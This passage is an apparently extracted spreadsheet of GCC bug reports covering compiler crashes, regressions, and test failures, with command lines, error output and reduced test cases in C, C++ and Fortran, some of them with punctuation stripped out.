torsten@pulsar:~/rtems/gnu/powerpc-rtems/powerpc-rtems/libstdc++-v3/libsupc++$ /home/torsten/rtems/gnu/powerpc-rtems/./gcc/xgcc -shared-libgcc -B/home/torsten/rtems/gnu/powerpc-rtems/./gcc -nostdinc++ -L/home/torsten/rtems/gnu/powerpc-rtems/powerpc-rtems/libstdc++-v3/src -L/home/torsten/rtems/gnu/powerpc-rtems/powerpc-rtems/libstdc++-v3/src/.libs -nostdinc -B/home/torsten/rtems/gnu/powerpc-rtems/powerpc-rtems/newlib/ -isystem /home/torsten/rtems/gnu/powerpc-rtems/powerpc-rtems/newlib/targ-include -isystem /home/torsten/rtems/gnu/combined/newlib/libc/include -B/home/torsten/opt/powerpc-rtems/powerpc-rtems/bin/ -B/home/torsten/opt/powerpc-rtems/powerpc-rtems/lib/ -isystem /home/torsten/opt/powerpc-rtems/powerpc-rtems/include -isystem /home/torsten/opt/powerpc-rtems/powerpc-rtems/sys-include -L/home/torsten/rtems/gnu/powerpc-rtems/./ld -I/home/torsten/rtems/gnu/combined/libstdc++-v3/../gcc -I/home/torsten/rtems/gnu/powerpc-rtems/powerpc-rtems/libstdc++-v3/include/powerpc-rtems -I/home/torsten/rtems/gnu/powerpc-rtems/powerpc-rtems/libstdc++-v3/include -I/home/torsten/rtems/gnu/combined/libstdc++-v3/libsupc++ -fno-implicit-templates -Wall -Wextra -Wwrite-strings -Wcast-qual -fdiagnostics-show-location=once -ffunction-sections -fdata-sections -g -O2 -c ../../../../combined/libstdc++-v3/libsupc++/guard.cc -o guard.o
gimplification failed:
&amp;fake_mutex &lt;addr_expr 0xb7a660a0
    type &lt;pointer_type 0xb7a609a0
        type 
            SI
            size 
            unit size 
            user align 32 symtab 0 alias set -1 canonical type 0xb7c673f0 domain 
            pointer_to_this &gt;
        unsigned SI size  unit size 
        align 32 symtab 0 alias set -1 canonical type 0xb7a60a10&gt;
    constant invariant
    arg 0 
        addressable used static tree_1 decl_5 SI file ../../../../combined/libstdc++-v3/libsupc++/guard.cc line 51 size  unit size 
        align 32 context 
        (mem/s/c:SI (symbol_ref:SI (_ZN12_GLOBAL__N_110fake_mutexE) [flags 0x82] ) [33 fake_mutex+0 S4 A32])
        chain 
            VOID file ../../../../combined/libstdc++-v3/libsupc++/guard.cc line 50
            align 1 context  attributes  result  chain &gt;&gt;&gt;
../../../../combined/libstdc++-v3/libsupc++/guard.cc: In function â€˜void::init()â€™:
../../../../combined/libstdc++-v3/libsupc++/guard.cc:54: internal compiler error: gimplification failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
I'll attach the full (preprocessed) source once I get the chance by this silly web frontend -)
Friendly Torsten</t>
  </si>
  <si>
    <t>torsten</t>
  </si>
  <si>
    <t>GCC-13284</t>
  </si>
  <si>
    <t>[3.4 regression] 126 g++ failures due to lrand48 not defined</t>
  </si>
  <si>
    <t>Hello
126 out of the 148 failures I see with mainline on cygwin are due to this:
In file included from /home/Administrator/gcc/mainline/out/i686-pc-
cygwin/libstdc++-v3/include/algorithm:69
                 from /home/Administrator/gcc/mainline/out/i686-pc-
cygwin/libstdc++-v3/include/string:56
from /home/Administrator/gcc/mainline/gcc/gcc/testsuite/g++.dg/init/array4.C:8: 
/home/Administrator/gcc/mainline/out/i686-pc-cygwin/libstdc++-
v3/include/bits/stl_algo.h: In function `_Distance std::__random_number
(_Distance)':
/home/Administrator/gcc/mainline/out/i686-pc-cygwin/libstdc++-
v3/include/bits/stl_algo.h:1670: error: there are no arguments to `lrand48' 
that depend on a templ
ate parameter so a declaration of `lrand48' must be available
/home/Administrator/gcc/mainline/out/i686-pc-cygwin/libstdc++-
v3/include/bits/stl_algo.h:1670: error: (if you use `-fpermissive' G++ will 
accept your code but allowing the use of an undeclared name is deprecated)
Now newlib does not define lrand48 if __STRICT_ANSI__ and the testsuite is 
run with -ansi. Danny Smith suggests that cygwin's newlib should always 
define those C99 functions in C++ mode. 
But I wonder why _GLIBCXX_HAVE_LRAND48 is defined in the first place? 
Shouldn't the configure test for it be run in -ansi mode?</t>
  </si>
  <si>
    <t>GCC-33931</t>
  </si>
  <si>
    <t>[4.3 Regression] ICE: tree check: expected ssa_name have struct_field_tag in is_old_name at tree-into-ssa.c:566</t>
  </si>
  <si>
    <t>./f951 -quiet -O3 lucas_distrib_spec.min.f90 -w
lucas_distrib_spec.min.f90: In function 'fft_square':
lucas_distrib_spec.min.f90:61: internal compiler error: tree check: expected ssa_name have struct_field_tag in is_old_name at tree-into-ssa.c:566
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The non-checking ICE is
lucas_distrib_spec.f90: In function 'fft_square':
lucas_distrib_spec.f90:650: internal compiler error: in mark_operand_necessary at tree-ssa-dce.c:242
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-25153</t>
  </si>
  <si>
    <t>[4.0 Regression] Bug in name lookup in template -- 4.0 regression against 3.4</t>
  </si>
  <si>
    <t>The code below compiles fine with gcc 3.3.1 and 3.4.0 (and does the right thing) it produces a compile time error in 4.0.2.  Lookup of the ::value fails when it is instatiated via the bar or baz templates but succeeds when instantiated via the foo template.  (Use of the bar or baz templates will succeed if instantation has alread occured.)
Curiously the bug seems very specific -- a number of very similar pieces of code in 4.0.2's  header compile correctly.
// --------------------
extern C int printf( char const* ... )
namespace std2 {
  class ostream { void* ptr }
  class string
  ostream
} 
namespace serializable {
  struct two { std2::ostream a b }
  template  two operator&lt;&lt;(U
  template 
  struct impl {
    static T const
    static std2::ostream
    static const bool value 
      = sizeof( stream() &lt;&lt; make() ) == sizeof(std2::ostream)
  }
}
template      struct foo { foo() { printf(%d\n V) } }
template  struct baz : foo {}
template  struct bar : baz &gt; {}
struct X {}
int main() {
  bar()  // -- Fails
  baz &gt;() // -- Fails
  foo::value &gt;() // -- Succeeds
  baz &gt;() // -- Succeeds 
  bar()  // -- Succeeds
}
// Expected output: 0 0 0 0 0</t>
  </si>
  <si>
    <t>GCC-8948</t>
  </si>
  <si>
    <t>[3.3 regression] Definition of __i686 causes big Problems</t>
  </si>
  <si>
    <t xml:space="preserve">        
    Please remove the Definition of __i686 in
    gcc/gcc/config/i386/i386.h (line 578).
	It interferes with 
    .section .gnu.linkonce.t.__i686.get_pc_thunk.regax
	in sysdeps/unix/sysv/linux/i386/sysdep.h in glibc-2.3.1
	so this library can not be compiled any more for i686.
    Thanks
     Norbert Wolff
Release:
3.3 20021214 (experimental)
Environment:
System: Linux icarus 2.4.19 #1 i686
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../configure --with-gnu-ld --with-gnu-as --disable-nls
    -prefix=/opt/gcc3.3 i686-linux</t>
  </si>
  <si>
    <t>norbert_wolff</t>
  </si>
  <si>
    <t>GCC-54242</t>
  </si>
  <si>
    <t>[4.8 Regression] FAIL: gcc.target/i386/pad-10.c scan-assembler-not nop</t>
  </si>
  <si>
    <t>On Linux/x86-64 revision 190339:
http://gcc.gnu.org/ml/gcc-cvs/2012-08/msg00316.html
caused:
FAIL: gcc.dg/guality/pr54200.c  -O2 -flto -fuse-linker-plugin -fno-fat-lto-objects  line 20 z == 3
FAIL: gcc.dg/guality/pr54200.c  -Os  line 20 z == 3
FAIL: gcc.target/i386/pad-10.c scan-assembler-not nop</t>
  </si>
  <si>
    <t>GCC-51297</t>
  </si>
  <si>
    <t>[4.7 regression] Many gcov tests FAIL on Tru64 Solaris 8 and 9</t>
  </si>
  <si>
    <t>Between 20111110 (r181259) and 20111114 (r181350) many gcov tests started to
FAIL on Solaris 8 (SPARC and x86) and Tru64 UNIX V5.1B:
FAIL: g++.dg/gcov/gcov-1.C gcov failed: 
FAIL: g++.dg/gcov/gcov-1.C gcov failed: 
FAIL: g++.dg/gcov/gcov-10.C gcov failed: 
FAIL: g++.dg/gcov/gcov-10.C gcov failed: 
FAIL: g++.dg/gcov/gcov-11.C gcov failed: 
FAIL: g++.dg/gcov/gcov-11.C gcov failed: 
FAIL: g++.dg/gcov/gcov-2.C gcov failed: 
FAIL: g++.dg/gcov/gcov-2.C gcov failed: 
FAIL: g++.dg/gcov/gcov-3.C gcov failed: 
FAIL: g++.dg/gcov/gcov-3.C gcov failed: 
FAIL: g++.dg/gcov/gcov-4.C gcov failed: 
FAIL: g++.dg/gcov/gcov-4.C gcov failed: 
FAIL: g++.dg/gcov/gcov-5.C gcov failed: 
FAIL: g++.dg/gcov/gcov-5.C gcov failed: 
FAIL: g++.dg/gcov/gcov-7.C gcov failed: 
FAIL: g++.dg/gcov/gcov-7.C gcov failed: 
FAIL: gcc.misc-tests/gcov-1.c gcov failed: 
FAIL: gcc.misc-tests/gcov-10.c gcov failed: 
FAIL: gcc.misc-tests/gcov-10b.c gcov failed: 
FAIL: gcc.misc-tests/gcov-11.c gcov failed: 
FAIL: gcc.misc-tests/gcov-12.c gcov failed: 
FAIL: gcc.misc-tests/gcov-13.c gcov failed: 
FAIL: gcc.misc-tests/gcovpart-13b.c gcov failed: 
FAIL: gcc.misc-tests/gcov-14.c (test for excess errors)
WARNING: gcc.misc-tests/gcov-14.c compilation failed to produce executable
FAIL: gcc.misc-tests/gcov-14.c gcov failed: 
FAIL: gcc.misc-tests/gcov-15.c gcov failed: 
FAIL: gcc.misc-tests/gcov-2.c gcov failed: 
FAIL: gcc.misc-tests/gcov-3.c gcov failed: 
FAIL: gcc.misc-tests/gcov-4.c gcov failed: 
FAIL: gcc.misc-tests/gcov-4b.c gcov failed: 
FAIL: gcc.misc-tests/gcov-5b.c gcov failed: 
FAIL: gcc.misc-tests/gcov-6.c gcov failed: 
FAIL: gcc.misc-tests/gcov-7.c gcov failed: 
FAIL: gcc.misc-tests/gcov-8.c gcov failed: 
FAIL: gcc.misc-tests/gcov-9.c gcov failed: 
The message is pretty useless since it states no reason.
The problem is that gcov dies with a SEGV:
&gt; /var/gcc/regression/trunk/8-gcc-gas/build/gcc/gcov gcov-1.c
Segmentation Fault
Program received signal SIGSEGV Segmentation fault.
0x08056d17 in name_search (a_=0x80a2f70 b_=0x7ffffff8)
    at /vol/gcc/src/hg/trunk/local/gcc/gcov.c:838
838       return strcmp (a b-&gt;name)
(gdb) where
#0  0x08056d17 in name_search (a_=0x80a2f70 b_=0x7ffffff8)
    at /vol/gcc/src/hg/trunk/local/gcc/gcov.c:838
#1  0xbf6fc6ae in bsearch () from /usr/lib/libc.so.1
#2  0x08056d88 in find_source (file_name=0x80a2f70 )
    at /vol/gcc/src/hg/trunk/local/gcc/gcov.c:866
#3  0x0808066e in read_graph_file (argc=2 argv=0x80479f4)
    at /vol/gcc/src/hg/trunk/local/gcc/gcov.c:1017
#4  process_file (argc=2 argv=0x80479f4)
    at /vol/gcc/src/hg/trunk/local/gcc/gcov.c:571
#5  main (argc=2 argv=0x80479f4) at /vol/gcc/src/hg/trunk/local/gcc/gcov.c:423
The second argument to name_search is invalid it seems.
  Rainer</t>
  </si>
  <si>
    <t>GCC-39422</t>
  </si>
  <si>
    <t>[4.4 regression] Failing SPU vectorizer testcases</t>
  </si>
  <si>
    <t>The following two SPU test cases now fail on mainline (they pass on 4.3):
FAIL: gcc.dg/vect/costmodel/spu/costmodel-vect-76b.c scan-tree-dump-times vect vectorized 1 loops 1
FAIL: gcc.dg/vect/costmodel/spu/costmodel-vect-76c.c scan-tree-dump-times vect vectorized 1 loops 1</t>
  </si>
  <si>
    <t>GCC-43635</t>
  </si>
  <si>
    <t>[4.5/4.6 Regression] ICE in s390_emit_call at config/s390/s390.c:9484</t>
  </si>
  <si>
    <t>/usr/lib/gcc/s390-suse-linux/4.5/cc1 -fpreprocessed sqlite3.i -quiet -dumpbase sqlite3.c -march=z900 -mtune=z9-109 -m31 -mesa -auxbase-strip .libs/sqlite3.o -g -O2 -Wall -version -fmessage-length=0 -fstack-protector -funwind-tables -fasynchronous-unwind-tables -fPIC -o sqlite3.s
sqlite3.c: In function 'porter_stemmer':
sqlite3.c:104020:41: warning: value computed is not used
sqlite3.c:104024:39: warning: value computed is not used
sqlite3.c:104037:35: warning: value computed is not used
sqlite3.c:104042:39: warning: value computed is not used
sqlite3.c:104048:41: warning: value computed is not used
sqlite3.c:104053:39: warning: value computed is not used
sqlite3.c:104062:36: warning: value computed is not used
sqlite3.c:104069:37: warning: value computed is not used
sqlite3.c:104112:39: warning: value computed is not used
sqlite3.c:104132:34: warning: value computed is not used
sqlite3.c: At top level:
sqlite3.c:99963:12: warning: 'sqlite3Fts3DeleteVtab' declared 'static' but never defined
sqlite3.c:99964:12: warning: 'sqlite3Fts3InitVtab' declared 'static' but never defined
sqlite3.c:102221:13: warning: 'sqlite3Fts3IcuTokenizerModule' declared 'static' but never defined
sqlite3.c: In function 'unixDlSym':
sqlite3.c:26055:3: internal compiler error: in s390_emit_call at config/s390/s390.c:9484
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-2352</t>
  </si>
  <si>
    <t>inheritance on solaris</t>
  </si>
  <si>
    <t>Hi I just recently happened upon an oddity in gcc when compiling a simple
inheritance tree. 
I had been using gcc version 2.95.2 19991024 (release) and tried gcc
version 2.95.3 20010
125 (prerelease) to see if anything has changed but same
situation occurs. 
In the attached test.cc file i get:
on solaris with sunsoft 5.0 compilers i get a size of 8.
This is what i expect.  but...
on solaris with gcc-2.95.2 i get a size of 16 ??
If i make mefoo a non inherited class then the size on solaris with gcc-2.95.2 is 8.
For some reason the inheritance makes the size go from 8 to 16. 
Also when the double is in the base class instead of being in the inherited class the size is 8 (what i expect). 
Can someone explain this one to me?   Thanks.
Release:
gcc-2.95.2 and gcc-2.95.3 (pre-release)
Environment:
solaris 2.7
How-To-Repeat:
compile the attached file and run once on solaris.  Then edit file and remove inheritance of mefoo from foo making mefoo just a class.  Re-run.  In the first run the size is 16 in the second the size is 8.  Seems strange that sunsoft 5.0 compiler can correctly make this inherited class a size 8 as expected while gcc makes it 16.</t>
  </si>
  <si>
    <t>alan_gonzalez</t>
  </si>
  <si>
    <t>GCC-1581</t>
  </si>
  <si>
    <t>configure web page specifies cpplib never enabled by default</t>
  </si>
  <si>
    <t xml:space="preserve">	
http://gcc.gnu.org/install/configure.html
says:
 --enable-cpplib -- Specify that the functionality of CPP should be integrated
into the compiler itself. This is still under development but may be useful
in limited situations. This option is never enabled by default.
But I think it is enabled by default and useful in most situations etc.
Release:
2.97 20010106 (experimental)
Environment:
System: Linux celes.dgate.ORG 2.2.14-5.0.14smp #1 SMP Sun Mar 26 13:03:52 PST 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: mipsel-unknown-linux-gnu
configured with: ../gcc-20010107/configure --prefix=/usr/local/mipsel-linux --enable-shared --with-gnu-as --with-gnu-ld --enable-version-specific-runtime-libs --enable-languages=c --target=mipsel-linux
How-To-Repeat:
read http://gcc.gnu.org/install/configure.html compare to the fact that my
newly built compiler without --enable-cpplib identifies itself as
GNU CPP version 2.97 20010106 (experimental) (cpplib) (MIPSel GNU/Linux with ELF)
and that the option does not appear in any gcc/*/configure script</t>
  </si>
  <si>
    <t>brg</t>
  </si>
  <si>
    <t>GCC-33317</t>
  </si>
  <si>
    <t>CSHIFT/EOSHIFT: Rejects optional dummy for DIM=</t>
  </si>
  <si>
    <t>The following program should print twice T T T T as if DIM is not present 1 is assumed.
The standard does not forbid to pass a variable which has the OPTIONAL attribute to CSHIFT. NAG f95 and ifort print as expected twice T T T T.
gfortran simply crashes.
program test
 implicit none
 call sub(1)
 call sub()
contains
 subroutine sub(d)
   integer optional :: d
   print * cshift([.true..true..true..true.]1d)
 end subroutine
end program test</t>
  </si>
  <si>
    <t>GCC-12353</t>
  </si>
  <si>
    <t>[3.4 Regression] ICE in copyprop_hardreg_forward_1</t>
  </si>
  <si>
    <t>I stumbled across this while building a mips-elf-gas with a recent x86 Linux
compiler.  I'll attach the .i file to this bug.
$ gcc -c dwarf2dbg.i -O2
../../src/HEAD-2003-09-21/gas/dwarf2dbg.c: In function `dwarf2_finish':
../../src/HEAD-2003-09-21/gas/dwarf2dbg.c:1198: error: insn does not satisfy its
constraints:
(insn 1230 1229 1231 52 (set (strict_low_part (reg:QI 4 sil))
        (eq:QI (reg:CCZ 17 flags)
            (const_int 0 [0x0]))) 363 {setcc_2} (insn_list 1228 (insn_list 1229
(nil)))
    (expr_list:REG_DEAD (reg:CCZ 17 flags)
        (nil)))
../../src/HEAD-2003-09-21/gas/dwarf2dbg.c:1198: internal compiler error: in
copyprop_hardreg_forward_1 at regrename.c:1543
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-61910</t>
  </si>
  <si>
    <t>undefined computation in trans-expr.c gfc_conv_cst_int_power</t>
  </si>
  <si>
    <t>Analyzing with sanitized gfortran the following line
j=i**(-huge(0_8)-1)
I get the following message:
../../gcc-4.9.1/gcc/fortran/trans-expr.c:2107:48: runtime error: 
negation of -9223372036854775808 cannot be represented in type 'long int' 
cast to an unsigned type to negate this value to itself
The offending line in trans-expr.c is
n = (unsigned HOST_WIDE_INT) (m &lt; 0 ? -m : m)</t>
  </si>
  <si>
    <t>GCC-54112</t>
  </si>
  <si>
    <t>including complex.h and complex fails in C++03</t>
  </si>
  <si>
    <t>#include 
#ifdef FIX
#undef complex
#endif
#include 
fails to compile with glibc. Since libstdc++ already installs a complex.h wrapper that #include_next complex.h I guess it could easily #undef complex afterwards.
Note that you can include tr1/complex instead of complex if you prefer.
I guess I could also ask glibc to protect their #define with #ifndef __cplusplus.
It is strange that in C++11 it is impossible to have access to the C99 functions cacos and others since C++11 hijacks their header. g++ accepts _Complex I expect we should still have access to those functions.</t>
  </si>
  <si>
    <t>GCC-36245</t>
  </si>
  <si>
    <t>[4.4 Regression] internal compiler error: in build2_stat at tree.c:3116</t>
  </si>
  <si>
    <t>The following code produces an ICE with -O1 or -O2
$ cat foo.c
extern char buf1[10]
extern char buf2[10]
extern void b(int i int j int w)
void a() {
    int ij
    char *p
    int w
    p = buf1
    for(j = 0j &lt; 10 j++) {
	for(i = 0i &lt; 10 i++) {
	    w = *p
	    if(w != 1) {
		w = buf2[p - buf1]
		b(i*2+1 j w)
	    }
	    p++
	}
    }
}
$ gcc -O1 foo.c
foo.c: In function 'a':
foo.c:5: internal compiler error: in build2_stat at tree.c:3116
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>y</t>
  </si>
  <si>
    <t>GCC-45946</t>
  </si>
  <si>
    <t>ICE: in extract_insn at recog.c:2127 when using _Decimal128 with -Os -fno-omit-frame-pointer</t>
  </si>
  <si>
    <t>Created attachment 22001
reduced testcase
Compiler output:
$ gcc -Os -fno-omit-frame-pointer pr45946.c 
pr45946.c: In function 'foo':
pr45946.c:9:1: error: unrecognizable insn:
(insn 13 12 14 3 (set (mem/i:TI (pre_dec:DI (reg/f:DI 7 sp)) [0 S16 A128])
        (const_double 0 [0] 3476778912330022912 [0x3040000000000000] 0 [0] 0 [0])) pr45946.c:8 -1
     (nil))
pr45946.c:9:1: internal compiler error: in extract_insn at recog.c:2127
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Tested revisions:
r165152 - crash</t>
  </si>
  <si>
    <t>GCC-6990</t>
  </si>
  <si>
    <t>-O do better optimization than -O3/-O2/-Os on jump-to-jump for PowerPC</t>
  </si>
  <si>
    <t>File memmove.c with function memmove():
void *memmove (void *dst const void *src unsigned n) {
  void * tmp = dst
  char * d = (char*)dst
  char * s = (char*)src
  if (n) { 
    if (d &gt; s) {
      d += n           
      s += n           
      l1: //do-while loop bug in gcc 3.1 #6984
        * --d = * --s          
      if (--n) goto l1 
    } else {    
      --d              
      --s              
      l2: //do-while loop bug in gcc 3.1 #6984
        * ++d = * ++s          
      if (--n) goto l2 
    }           
  }     
  return tmp
}
Compilation with -O produces code:
memmove:
  mtctr 5
  cmpwi 050 
  beqlr- 0
  cmplw 034 
  ble- 0.L3 
  add 935 
  add 445 
.L4:
  lbzu 0-1(4)
  stbu 0-1(9)
  bdnz .L4
  blr   
.L3:
  addi 93-1
  addi 44-1
.L7:
  lbzu 01(4)
  stbu 01(9)
  bdnz .L7
  blr
Compilation with -O3 produces code:
memmove:
  cmpwi 050 
  mtctr 5
  beqlr- 0
  cmplw 034 
  ble- 0.L3 
  add 935 
  add 445 
.L4:
  lbzu 5-1(4)
  stbu 5-1(9)
  bdnz .L4
.L2:
  blr   
.L3:
  addi 93-1
  addi 44-1
.L7:
  lbzu 51(4)
  stbu 51(9)
  bdnz .L7
  b .L2 
Note last instruction 'b .L2' - it is jump to another jump 'blr' after label '.L2'.
-O managed to produce 'blr' for last instruction.
Release:
3.1 20020510
Environment:
--with-gcc-version-trigger=/home/install/gcc-3.1-20020510/gcc/version.c --host=i686-pc-linux-gnu --with-newlib --enable-target-optspace --target=ppc-eabi --prefix=/home/crossGCC/ppc-eabi --with-local-prefix=/home/crossGCC/ppc-eabi --program-prefix=ppc-eabi- --enable-languages=cc++ -v --norecursion
How-To-Repeat:
Command lines looks like:
ppc-eabi-gcc -S -O memmove.c -Wall
ppc-eabi-gcc -S -O3 memmove.c -Wall</t>
  </si>
  <si>
    <t>fshvaige</t>
  </si>
  <si>
    <t>GCC-9295</t>
  </si>
  <si>
    <t>[mips-rtems] config/mips/rtems.h init/fini issue</t>
  </si>
  <si>
    <t>2003-01-13      Joel Sherrill 
        * config/mips/rtems.h: Predefine __USE_INIT_FINI__ so generic
        RTEMS code knows which C++ initialization style the toolset
        configuration is using.
Release:
gcc 3.3 and trunk</t>
  </si>
  <si>
    <t>GCC-2769</t>
  </si>
  <si>
    <t>Compiler doesn't find existing copy constructor</t>
  </si>
  <si>
    <t>Compiler appears to complain about a missing copy constructor that is actually defined.
Compiles fine on IRIX 6.5.x MIPSpro 7.3.1.1m compiler.
Release:
g++ v3.0 daily snapshot 7th May 2001 from codesourcery.com
Environment:
Standard i686 Redhat 6.2 install with snapshot installed (replacing default installed 2.96 develop snapshot shipped)
How-To-Repeat:
==== Place in TriangleIterator.hpp ====
#ifndef _GFX_TRIANGLEITERATOR_HPP_
#define _GFX_TRIANGLEITERATOR_HPP_
#include 
typedef unsigned int Int
class Triangle
{
public:
  Triangle() {}
  Triangle(const Triangle
  virtual ~Triangle() {}
}
class TriangleContainer
class TriangleIterator 
	: public std::iterator
{
public:
  explicit TriangleIterator(const TriangleIterator
  virtual ~TriangleIterator()
  TriangleIterator(const TriangleContainer
}
#endif
===== Place in TriangleContainer.hpp ===========
#ifndef _GFX_TRIANGLECONTAINER_HPP_
#define _GFX_TRIANGLECONTAINER_HPP_
class TriangleIterator
class TriangleContainer
{
public:
  typedef TriangleIterator const_iterator
  virtual const_iterator begin() const
protected:
  friend class TriangleIterator
}
#endif
======== Place in TriangleContainer.cpp ===========
#include TriangleContainer.hpp
#include TriangleIterator.hpp
TriangleContainer::const_iterator TriangleContainer::begin() const
{
	return TriangleIterator(*this true) 
}
====== Issue compile command: =========
g++ -c TriangleContainer.cpp -o TriangleContainer.o
TriangleContainer.cpp: In method `TriangleIterator 
TriangleContainer::begin () const':
TriangleContainer.cpp:6: no matching function for call to 
`TriangleIterator::TriangleIterator (TriangleIterator)'</t>
  </si>
  <si>
    <t>jungdl</t>
  </si>
  <si>
    <t>GCC-14942</t>
  </si>
  <si>
    <t>Incorrect results with implied-do loops and list directed I/O</t>
  </si>
  <si>
    <t xml:space="preserve">	
The use of list directed I/O and implied-do loops gives incorrect
results.  Consider the program: 
      program d
      implicit none
      integer i j m n nin
      real x(34)
      nin = 1
      open(unit = nin file = 'd.dat')
      read(nin fmt = *) n
      write(*'(AI2)') 'n = ' n
      do i = 1 3
         read(nin fmt = *) (x(ij) j=1 n)
         write(* *) (x(ij) j=1 n)
      end do
      read(nin fmt = *) m n
      write(*'(AI22XAI2)') 'm = ' m 'n = ' n
      do i = 1 m
         read(nin fmt = *) (x(ij) j=1 n)
         write(* *) (x(ij) j=1 n)
      end do
      end program d
G77 produces the following output
kargl[234] ./d
n =  4
  1.  2.  3.  4.
  1.  2.  3.  4.
  1.  2.  3.  4.
m =  3  n =  4
  1.  2.  3.  4.
  1.  2.  3.  4.
  1.  2.  3.  4.
while gfortran produces
kargl[236] ./d
n =  4
   1.000000        0.000000        2.000000       3.9933076E-34    
   1.000000        0.000000        2.000000       6.1756624E-41    
   1.000000        0.000000        2.000000       4.0700904E-34    
m =  1  n =  3
   1.000000        0.000000        2.000000
Environment:
System: FreeBSD c-67-168-59-70.client.comcast.net 5.2-CURRENT FreeBSD 5.2-CURRENT #3: Sun Mar 28 10:41:35 PST 2004 kargl@c-67-168-59-70.client.comcast.net:/usr/obj/usr/src/sys/HOTRATS i386
host: i386-unknown-freebsd5.2
build: i386-unknown-freebsd5.2
target: i386-unknown-freebsd5.2
configured with: ../gcc/configure --prefix=/home/kargl/gcc-ssa/work --disable-libmudflap --enable-languages=cf95 --with-gmp=/usr/local
How-To-Repeat:
Compile the above program and run.</t>
  </si>
  <si>
    <t>GCC-4581</t>
  </si>
  <si>
    <t>ICE in change_address_1 at emit-rtl.c:1757</t>
  </si>
  <si>
    <t>../gcc/configure --prefix=${PREFIX}  --with-cpu=ultrasparc &amp;&amp; 
make CFLAGS='-O2' LIBCFLAGS='-g -O2' LIBCXXFLAGS='-g -O2 -fno-implicit-templates' bootstrap
failed with
/export/home/ask/build/gcc-build/gcc/xgcc -B/export/home/ask/build/gcc-
build/gcc/ -nostdinc++ -L/export/home/ask/build/gcc-build/sparc-sun-solaris2.6/l
ibstdc++-v3/src -L/export/home/ask/build/gcc-build/sparc-sun-solaris2.6/libstdc+
+-v3/src/.libs -B/sparc-sun-solaris2.6/bin/ -B/sparc-sun-solaris2.6/lib/ -isyste
m /sparc-sun-solaris2.6/include -nostdinc++ -I/export/home/ask/build/gcc-build/s
parc-sun-solaris2.6/libstdc++-v3/include/sparc-sun-solaris2.6 -I/export/home/ask
/build/gcc-build/sparc-sun-solaris2.6/libstdc++-v3/include -I../../../../gcc/lib
stdc++-v3/libsupc++ -I../../../../gcc/libstdc++-v3/libmath -g -O2 -fno-implicit-
templates -Wall -Wno-format -W -Wwrite-strings -Winline -fdiagnostics-show-locat
ion=once -ffunction-sections -fdata-sections -g -c ../../../../gcc/libstdc++-v3/src/cmath.cc -o cmath.o &gt;/dev/null 2&gt;&amp;1
make[4]: *** [cmath.lo] Error 1
make[4]: Leaving directory `/export/home/ask/build/gcc-build/sparc-sun-solaris2.6/libstdc++-v3/src'
make[3]: *** [all-recursive] Error 1
make[3]: Leaving directory `/export/home/ask/build/gcc-build/sparc-sun-solaris2.6/libstdc++-v3'
make[2]: *** [all-recursive-am] Error 2
make[2]: Leaving directory `/export/home/ask/build/gcc-build/sparc-sun-solaris2.6/libstdc++-v3'
make[1]: *** [all-target-libstdc++-v3] Error 2
make[1]: Leaving directory `/export/home/ask/build/gcc-build'
Redirection of error obfuscate the reson so
cd build/gcc-build/sparc-sun-solaris2.6/libstdc++-v3/src
gives the reason:
/export/home/ask/build/gcc-build/sparc-sun-solaris2.6/libstdc++-v3/include/bits/cmath.tcc: In
   function `_Tp std::__cmath_power(_Tp unsigned int) [with _Tp = long
   double]':
../../../../gcc/libstdc++-v3/src/cmath.cc:45:   instantiated from here
/export/home/ask/build/gcc-build/sparc-sun-solaris2.6/libstdc++-v3/include/bits/cmath.tcc:50: Internal
   compiler error in change_address_1 at emit-rtl.c:1757
Release:
3.1 20011015 (CVS)
Environment:
SunOS iridium 5.6 Generic_105181-20 sun4u sparc SUNWUltra-5_10</t>
  </si>
  <si>
    <t>GCC-67107</t>
  </si>
  <si>
    <t>[6 Regression] ICE: SIGSEGV in tree_class_check with -frounding-math -funsafe-math-optimizations</t>
  </si>
  <si>
    <t>Created attachment 36115
reduced testcase
Compiler output:
$ gcc -frounding-math -funsafe-math-optimizations testcase.c 
testcase.c: In function 'test':
testcase.c:3:3: internal compiler error: Segmentation fault
   return 5.0 &lt; 5.0 - 0.1
   ^
0xc19cdf crash_signal
        /mnt/svn/gcc-trunk/gcc/toplev.c:352
0x9845d6 tree_class_check(tree_node* tree_code_class char const* int char const*)
        /mnt/svn/gcc-trunk/gcc/tree.h:2980
0x9845d6 generic_simplify_GT_EXPR
        /home/smatz/build-226486-lto-fortran-checking-yes-rtl-df/gcc/generic-match.c:18582
0x990dfd generic_simplify(unsigned int tree_code tree_node* tree_node* tree_node*)
        /home/smatz/build-226486-lto-fortran-checking-yes-rtl-df/gcc/generic-match.c:34963
0x85073e fold_binary_loc(unsigned int tree_code tree_node* tree_node* tree_node*)
        /mnt/svn/gcc-trunk/gcc/fold-const.c:9108
0x85d67a fold_build2_stat_loc(unsigned int tree_code tree_node* tree_node* tree_node*)
        /mnt/svn/gcc-trunk/gcc/fold-const.c:12781
0x66d093 c_fully_fold_internal
        /mnt/svn/gcc-trunk/gcc/c-family/c-common.c:1361
0x66e1e5 c_fully_fold(tree_node* bool bool*)
        /mnt/svn/gcc-trunk/gcc/c-family/c-common.c:1144
0x5e762c c_finish_return(unsigned int tree_node* tree_node*)
        /mnt/svn/gcc-trunk/gcc/c/c-typeck.c:9379
0x62332e c_parser_statement_after_labels
        /mnt/svn/gcc-trunk/gcc/c/c-parser.c:5042
0x6248d5 c_parser_compound_statement_nostart
        /mnt/svn/gcc-trunk/gcc/c/c-parser.c:4696
0x62511e c_parser_compound_statement
        /mnt/svn/gcc-trunk/gcc/c/c-parser.c:4533
0x620f67 c_parser_declaration_or_fndef
        /mnt/svn/gcc-trunk/gcc/c/c-parser.c:1966
0x62b297 c_parser_external_declaration
        /mnt/svn/gcc-trunk/gcc/c/c-parser.c:1436
